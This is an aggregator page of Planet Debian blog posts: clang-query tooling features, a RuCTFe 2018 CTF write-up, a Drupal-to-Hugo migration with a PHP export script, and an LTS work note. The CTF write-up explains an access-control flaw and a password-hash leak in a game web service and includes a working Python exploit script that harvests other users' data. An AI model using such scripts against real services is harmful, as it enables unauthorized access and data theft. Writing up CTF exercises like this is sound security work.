Over the last few weeks I published some blogs on the Visual C++ blog about Clang AST Matchers. The series can be found here:

I am not aware of any similar series existing which covers creation of clang-tidy checks, and use of clang-query to inspect the Clang AST and assist in the construction of AST Matcher expressions. I hope the series is useful to anyone attempting to write clang-tidy checks. Several people have reported to me that they have previously tried and failed to create clang-tidy extensions, due to various issues, including lack of information tying it all together.

Other issues with clang-tidy include the fact that it relies on the “mental model” a compiler has of C++ source code, which might differ from the “mental model” of regular C++ developers. The compiler needs to have a very exact representation of the code, and needs to have a consistent design for the class hierarchy representing each standard-required feature. This leads to many classes and class hierarchies, and a difficulty in discovering what is relevant to a particular problem to be solved.

I noted several problems in those blog posts, namely:

  • clang-query does not show AST dumps and diagnostics at the same time
  • Code completion does not work with clang-query on Windows
  • AST Matchers which are appropriate to use in contexts are difficult to discover
  • There is no tooling available to assist in discovery of source locations of AST nodes

Last week at code::dive in Wroclaw, I demonstrated tooling solutions to all of these problems. I look forward to video of that talk (and videos from the rest of the conference!) becoming available.

Meanwhile, I’ll publish some blog posts here showing the same new features in clang-query and clang-tidy.

clang-query in Compiler Explorer

Recent work by the Compiler Explorer maintainers adds the possibility to use source code tooling with the website. The compiler explorer contains new entries in a menu to enable a clang-tidy pane.

clang-tidy in Compiler Explorer

I demonstrated use of Compiler Explorer to run the clang-query tool at the code::dive conference, building upon the recent work by the Compiler Explorer developers. This feature will get upstreamed in time, but can be used with my own AWS instance for now. This is suitable for exploration of the effect that changing source code has on match results, and orthogonally, the effect that changing the AST Matcher has on the match results. It is also accessible via

It is important to remember that Compiler Explorer is running clang-query in script mode, so it can process multiple let and match calls for example. The new command set print-matcher true helps distinguish the output from the matcher which causes the output. The help command is also available with listing of the new features.

The issue of clang-query not printing both diagnostic information and AST information at the same time means that users of the tool need to alternate between writing

set output diag

and

set output dump

to access the different content. Recently, I committed a change to make it possible to enable both dump and diag output from clang-query at the same time. New commands follow the same structure as the set output command:

enable output dump
disable output dump

The set output <feature> command remains as an “exclusive” setting to enable only one output feature and disable all others.

Dumping possible AST Matchers

This command design also enables the possibility of extending the features which clang-query can output. Up to now, developers of clang-tidy extensions had to inspect the AST corresponding to their source code using clang-query and then use that understanding of the AST to create an AST Matcher expression.

That mapping to and from the AST “mental model” is not necessary. New features I am in the process of upstreaming to clang-query enable the output of AST Matchers which may be used with existing bound AST nodes. The command

enable output matcher

causes clang-query to print out all matcher expressions which can be combined with the bound node. This cuts out the requirement to dump the AST in such cases.

Inspecting the AST is still useful as a technique to discover possible AST Matchers and how they correspond to source code. For example if the functionDecl() matcher is already known and understood, it can be dumped to see that function calls are represented by the CallExpr in the Clang AST. Using the callExpr() AST Matcher and dumping possible matchers to use with it leads to the discovery that callee(functionDecl()) can be used to determine particulars of the function being called. Such discoveries are not possible by only reading AST output of clang-query.

Dumping possible Source Locations

The other important discovery space in creation of clang-tidy extensions is that of Source Locations and Source Ranges. Developers creating extensions must currently rely on the documentation of the Clang AST to discover available source locations which might be relevant. Usually though, developers have the opposite problem. They have source code, and they want to know how to access a source location from the AST node which corresponds semantically to that line and column in the source.

It is important to use a semantically relevant source location in order to build reliable tools which refactor at scale and without human intervention. For example, a cursory inspection of the locations available from a FunctionDecl AST node might lead to the belief that the return type is available at the getBeginLoc() of the node.

However, this is immediately challenged by the C++11 trailing return type feature, where the actual return type is located at the end. For a semantically correct location, you must currently use


It should be possible to use getReturnTypeSourceRange(), but a bug in clang prevents that as it does not appreciate the trailing return types feature.

Once again, my new output feature of clang-query presents a solution to this discovery problem. The command

enable output srcloc

causes clang-query to output the source locations by accessor and caret corresponding to the source code for each of the bound nodes. By inspecting that output, developers of clang-tidy extensions can discover the correct expression (usually via the clang::TypeLoc hierarchy) corresponding to the source code location they are interested in refactoring.

Next Steps

I have made many more modifications to clang-query which I am in the process of upstreaming. My Compiler Explorer instance is listed as the 'clang-query-future' tool, while the clang-query-trunk tool runs the current trunk version of clang-query. Both can be enabled for side-by-side comparison of the future clang-query with the existing one.

RuCTFe 2018 laberator

Planet Debian - Dje, 11/11/2018 - 4:33md

Crew: izibi, siccegge
CTF: RuCTFe 2018

The service

A web service written in Go. It has some pretty standard functionality (register, login, store a string), with the logic somewhat dispersed between the main webserver in main.go, some stuff in the templates and the websockets endpoint in command_executor.go. Obviously you have to extract the strings ("labels") from the gameserver. The phrase stored when creating the account was also used to store some more flags.

Client side authentication for labels

A gem from the viewLabel JavaScript function: for some reason the label's owner is checked client-side, after the data was already returned to the client.

let label = JSON.parse(;
if (label.Owner !== getLoginFromCookies()) {
    return;
}

And indeed, the websocket view method checks for a valid session but doesn't concern itself with any further validation of access privileges. As long as you have any valid session and can figure out websockets, you can get just about any label you like.

"view": func(ex *CommandExecutor, data []byte) ([]byte, error) { var viewData ViewData err := json.Unmarshal(data, &viewData) if err != nil { return nil, createUnmarshallingError(err, data) } cookies := parseCookies(viewData.RawCookies) ok, _ := if !ok { return nil, errors.New("invalid session") } label, err := ex.dbApi.ViewLabel(viewData.LabelId) if err != nil { return nil, errors.New(fmt.Sprintf("db request error: %v, labelId=(%v)", err.Error(), viewData.LabelId)) } rawLabel, err := json.Marshal(*label) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, label=(%v)", err.Error(), *label)) } return rawLabel, nil },

Putting things together, the exploit creates a fresh account. It generates a label (to figure out the IDs of the most recent labels) and then bulk loads the last 100 labels:

#!/usr/bin/env python3
import requests
import websocket
import json
import sys
import string
import random
import base64

def main():
    host = sys.argv[1]
    session = requests.session()
    password = [i for i in string.ascii_letters]
    random.shuffle(password)
    username = ''.join(password[:10])
    phrase = base64.b64encode((''.join(password[10:20])).encode()).decode()
    password = base64.b64encode((''.join(password[20:36])).encode()).decode()
    x = session.get('http://%s:8888/register?login=%s&phrase=%s&password=%s'
                    % (host, username, phrase, password))
    x = session.get('http://%s:8888/login?login=%s&password=%s'
                    % (host, username, password))
    raw_cookie = 'login=%s;sid=%s' % (x.cookies['login'], x.cookies['sid'])

    ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))
    data = {'Text': 'test', 'Font': 'Arial', 'Size': 20, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "create", "Data": json.dumps(data)}))
    # make sure create is already committed before continuing
    ws.recv()

    data = {'Offset': 0, 'RawCookies': raw_cookie}
    ws.send(json.dumps({"Command": "list", "Data": json.dumps(data)}))
    stuff = json.loads(ws.recv())
    lastid = stuff[0]['ID']

    for i in range(0 if lastid-100 < 0 else lastid-100, lastid):
        ws = websocket.create_connection('ws://%s:8888/cmdexec' % (host,))
        try:
            data = {'LabelId': i, 'RawCookies': raw_cookie}
            ws.send(json.dumps({"Command": "view", "Data": json.dumps(data)}))
            print(json.loads(ws.recv())["Text"])
        except Exception:
            pass

if __name__ == '__main__':
    main()

Password Hash

The hash module used is obviously suspect. It consists of a binary and a wrapper, freshly uploaded to GitHub just the day before. Also, if you create a test account with a short password (say, test) you end up with a hash that contains the password in plain (say, testTi\x02mH\x91\x96U\\I\x8a\xdd). Looking closer, if you register with a password that is exactly 16 characters (aaaaaaaaaaaaaaaa) you end up with a 16-character hash that is identical to the password. This also means the password hash is a valid password for the account.

Listening to tcpdump for a while you'll notice interesting entries:


See the password hash there? Turns out this comes from the regularly scheduled last_users websocket call.

"last_users": func(ex *CommandExecutor, _ []byte) ([]byte, error) { users := ex.dbApi.GetLastUsers() rawUsers, err := json.Marshal(*users) if err != nil { return nil, errors.New(fmt.Sprintf("marshalling error: %v, users=(%v)", err.Error(), *users)) } return rawUsers, nil },

So call last_users (it doesn't even need a session), log in as each of the last 20 users and just load all the labels. Good thing passwords are transferred base64 encoded, so no worrying about non-printable characters in the password hash.
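The step of reusing a leaked hash as a password can be sketched like this (the hash bytes below are made up; the point is only that base64 makes arbitrary bytes safe to submit as the password parameter):

```python
import base64

# hypothetical 16-byte password hash sniffed from the last_users traffic
leaked_hash = bytes(range(0x90, 0xA0))

# since hashing a 16-character password yields the password itself,
# the leaked hash is a valid password; base64 lets its non-printable
# bytes travel in the login request unharmed
password_param = base64.b64encode(leaked_hash).decode("ascii")

# the server decodes it back to the exact original bytes
assert base64.b64decode(password_param) == leaked_hash
print(password_param)
```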

Additionally, sessions were generated with the broken hash implementation. This probably would have made it possible to compute session IDs.

Christoph Egger Christoph's last Weblog entries

Migrating from Drupal to Hugo

Planet Debian - Dje, 11/11/2018 - 12:30md
TL;DR: Migrating my website from Drupal 7 to Hugo

Jump directly to the end titled Migration to Hugo

Initial website

Looking back at my website's history, the domain was first registered sometime in 2003. Back then, it was mostly a couple of HTML pages. Being (and still) a novice in web matters, my website was mostly built on ideas from others. IIRC, for the bare HTML one, I took a lot of the visual details from Miss Garrels' website.

First blog

My initial blog was self-hosted with a blogging software in PHP named PivotX. Its website still works, so hopefully the project is still alive. It was a pretty good tool for the purpose: very lean, with support for data backends in both MySQL and flat files. The latter was important to me as I wanted to keep it simple.


My first interaction with Drupal was with its WSOD (White Screen of Death). That was it, until I revisited it when evaluating different FOSS web tools to build a community site for one of my previous employers.

Back then, we tried multiple tools: Jive, Joomla, WordPress and many more. But finally we settled on Drupal. The requirement was to have something which could filter content under nested categories. Of the many things we tried, the only one which seemed able to do that was Drupal with its Taxonomy feature, along with a couple of community-driven add-on modules.

We built it, but there were other challenges. It was hard to find people who were good with Drupal. I remember interviewing around 10-15 people who could take over the web portal and maintain it, and still not being able to fill the position. Eventually, I ended up maintaining the portal by myself.

Migrating my website to Drupal

The easiest way to deal with the maintenance was to have one more live portal running Drupal. My website, which back then had the ambitious goal of also serving an online shopping cart, was the perfect candidate. So I migrated my website from PivotX to Drupal 6. Drupal had a nice RSS Import module which was able to pull in most of the content, except the comments on each article. I think that is more a limitation of RSS feeds. But the only data import path I could find back then was to import content through RSS feeds.

Initially, Drupal looked like a nice tool. Lots of features and a vibrant community made it very appealing. And I had always wanted to build some skills hands-on (that's how the job market likes it; irrespective of the skills, it is the hands-on part that they evaluate) by using Drupal at both the employer's community portal and my personal website.

Little did I know that running/maintaining a website is one aspect, whereas extending it is another (mostly expensive) affair.

Drupal 7

That was the first blow. For a project serving as a platform, Drupal was a PITA when dealing with migrations. And it is not about migrations to a different platform. Rather an upgrade from one major release to another.

Having been using Debian for quite some time, this approach from Drupal brought back memories from the past, of when using Red Hat Linux and SuSE Linux distribution; where upgrades were not a common term, and every major release of the distribution people were mostly recommended to re-install.

Similar was the case with Drupal. Every major release, many (core) modules would be dropped. Many add-on modules would lose support. Neither the project nor the community around it was helpful anymore.

But somehow, I eventually upgraded to Drupal 7. I did lose a lot of functionality. My nested taxonomy was gone and my themes were all broken. For the web novice that I am, it took me some time to fix those issues.

But the tipping point came with Drupal 8. It took the pain to the next level, repeating the same process of dropping modules and breaking functionality; I never heard much about backward compatibility on this platform.


For quite some time I kept looking for a migration path away from Drupal 7. I did not care what it was as long as it was FOSS, and had an active community around it. The immediate first choice was WordPress. By this time, my web requirements had trimmed down. No more did I have outrageous ideas of building all solutions (Web, Blog, Cart) in a single platform. All I did was mostly blog and had a couple of basic pages.

The biggest problem was migration. WP has a module that does migration. But, for whatever annoying reason, the free version of it would only pick 7 articles from the total. And it did not import comments. So with WP I would still be prone to the same annoyances, limited as I am with web technologies. This migration path did not enthuse me much: it felt more like the Hindi idiom आसमान से गिरे और खजूर में अटके ("fell from the sky, only to get stuck in a palm tree" - out of one trouble and into another).

I also attempted Jekyll and Hugo. My limited initial attempts were disappointing. Jekyll had an import module which, IIRC, did not work properly. Similar was the case with Hugo, which has a module listed on its migration page, drupal2hugo, that is a disappointment right from the start.

With nothing much left, I just kept postponing my (desperate) plans to migrate.

Migration to Hugo

Luckily, I was able to find some kind soul sharing migration scripts to help migrate from Drupal 7 to Hugo. Not everything could be migrated (I had to let go of the comments), but I was in no position to wait any longer.

With very minimal changes to adapt it to my particular setup, I was able to migrate most of my content. Now, my website is running on markdown generated with Hugo. More than the tool, I am happy to have the data available in a much standard format.

If there’s one thing that I’m missing on my website, it is mostly the commenting system. I would love to have a simple way to accept user comments integrated into Hugo itself, which would just append those comments to their respective posts. Hopefully soon, when I have (some more) free time.

<?php
define('DRUPAL_ROOT', __DIR__);
include_once(DRUPAL_ROOT . '/includes/');
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);

$nids = db_query('SELECT DISTINCT(nid) FROM {node}')
    ->fetchCol();
$nodes = node_load_multiple($nids);

foreach ($nodes as $node) {
    $front_matter = array(
        'title' => $node->title,
        'date' => date('c', $node->created),
        'lastmod' => date('c', $node->changed),
        'draft' => 'false',
    );

    if (count($node->taxonomy_vocabulary_2[LANGUAGE_NONE])) {
        $tags = taxonomy_term_load_multiple(
            array_column(
                $node->taxonomy_vocabulary_2[LANGUAGE_NONE],
                'tid'
            )
        );
        $front_matter['tags'] = array_column($tags, 'name');
    }

    if (count($node->taxonomy_vocabulary_1[LANGUAGE_NONE])) {
        $cat = taxonomy_term_load_multiple(
            array_column(
                $node->taxonomy_vocabulary_1[LANGUAGE_NONE],
                'tid'
            )
        );
        $front_matter['categories'] = array_column($cat, 'name');
    }

    $path = drupal_get_path_alias('node/'.$node->nid);
    if ($path != 'node/'.$node->nid) {
        $front_matter['url'] = '/'.$path;
        $content_dir = explode('/', $path);
        $content_dir = end($content_dir);
    } else {
        $content_dir = $node->nid;
    }

    $content = json_encode(
        $front_matter,
        JSON_PRETTY_PRINT|JSON_UNESCAPED_SLASHES|JSON_UNESCAPED_UNICODE
    );
    $content .= "\n\n";

    $tmp_file = '/tmp/node.html';
    file_put_contents($tmp_file, $node->body['fr'][0]['value']);
    $body = shell_exec('html2markdown '.$tmp_file);
    unlink($tmp_file);
    //$body = $node->body['fr'][0]['value'];
    $content .= $body;

    $dir_name = '/tmp/hugo/content/'.$node->type.'/'.$content_dir;
    mkdir($dir_name, 0777, true);
    file_put_contents($dir_name.'/', $content);
}
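For illustration, the front matter the script above emits at the top of each generated file looks roughly like the following (a sketch rebuilt in Python with hypothetical field values; the real values come from the Drupal node):

```python
import json

# hypothetical node data; the keys mirror the $front_matter array above
front_matter = {
    "title": "Migrating from Drupal to Hugo",
    "date": "2018-11-11T12:30:00+05:30",
    "lastmod": "2018-11-11T12:30:00+05:30",
    "draft": "false",
    "tags": ["Drupal", "Hugo"],
    "categories": ["Debian-Blog"],
    "url": "/blog/drupal-to-hugo",
}

# Hugo accepts a JSON object as front matter, followed by the markdown body
content = json.dumps(front_matter, indent=4) + "\n\n" + "The post body, in markdown...\n"
print(content)
```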

Ritesh Raj Sarraf Debian Blog on RESEARCHUT


Planet Debian - Sht, 10/11/2018 - 9:47md
My LTS work in October

In October 2018 sadly I just managed to spend 1h working on jessie LTS on:

Today, while writing this, I also noticed that currently misses DLAs 1532 through 1541, which I have just reported to the #debian-lists IRC channel and as #913426. Update: as that bug was closed quickly, I guess instead we need to focus on #859123 and #859122, so that DLAs are accessible to everyone in future.

Holger Levsen Any sufficiently advanced thinking is indistinguishable from madness


Subscribe to AlbLinux agreguesi